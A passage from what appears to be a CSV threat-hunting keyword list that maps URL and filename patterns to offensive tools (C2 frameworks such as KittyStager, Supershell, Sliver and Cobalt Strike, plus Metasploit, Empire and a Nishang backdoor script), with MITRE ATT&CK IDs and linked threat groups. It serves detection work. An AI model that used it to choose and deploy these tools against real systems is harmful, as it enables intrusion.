TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,1,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z -*http://127.0.0.1:8080*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*http://127.0.0.1:8081*,greyware_tool_keyword,Browser-C2,Post Exploitation agent which uses a browser to do C2 operations.,T1105 - T1043 - T1102,TA0003 - TA0005 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/Browser-C2,1,1,N/A,10,10,99,32,2018-05-25T15:12:21Z,2018-05-22T14:33:24Z -*http://127.0.0.1:9090/*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*http://192.168.1.179:8000/session*,offensive_tool_keyword,CloakNDaggerC2,A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.,T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002,TA0011 - TA0042 - TA0003,N/A,N/A,C2,https://github.com/matt-culbert/CloakNDaggerC2,1,1,N/A,10,10,4,2,2023-10-02T19:54:24Z,2023-04-28T01:58:18Z -*http://LhOsT/FiLNaMe.*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*http://localhost:3000/ui/panel*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*http://localhost:30662*,offensive_tool_keyword,o365-attack-toolkit,A toolkit to attack Office365,T1110 - T1114 - T1119 - T1197 - T1087.002,TA0001 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/mdsecactivebreach/o365-attack-toolkit,1,1,N/A,10,10,954,218,2020-11-06T12:09:26Z,2019-07-22T10:39:46Z -*http://localhost:58082/broadcast?id=*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,1,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*http://localhost:7474/browser/*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,neo4j default local url,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*http://localhost:7681*,greyware_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*http://localhost:8080*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*http://localhost:9090/*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*http://shell:7681/token*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*http://tarantula.by.ru/localroot/*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*http://tarantula.by.ru/localroot/2.6.x/h00lyshit*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*http://vpsip:28888*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*http://wfuzz.org*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*http_default_pass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*http_default_users.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*http_malleable.py*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*http_ntlmrelay.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*http_owa_common.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*http_stager_client_header*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*http_stager_server_append*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*http_stager_server_header*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*http_stager_server_prepend*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*http_stager_uri_x64*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*http_stager_uri_x86*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*http1.x64.bin*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*http1.x64.dll*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*HTTPAES256Handler.*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*httpattack.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*httpattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*httpattack.py*,offensive_tool_keyword,PrivExchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1091.001 - T1101 - T1201 - T1570,TA0006,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PrivExchange,1,1,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*httpattack.py*,offensive_tool_keyword,privexchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1053.005 - T1078 - T1069.002,TA0002 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/dirkjanm/PrivExchange,1,1,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*httpattacks/*.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*HTTP-Backdoor.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*http-c2_test.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*HttpEvilClippyController*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*HTTP-Login.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - 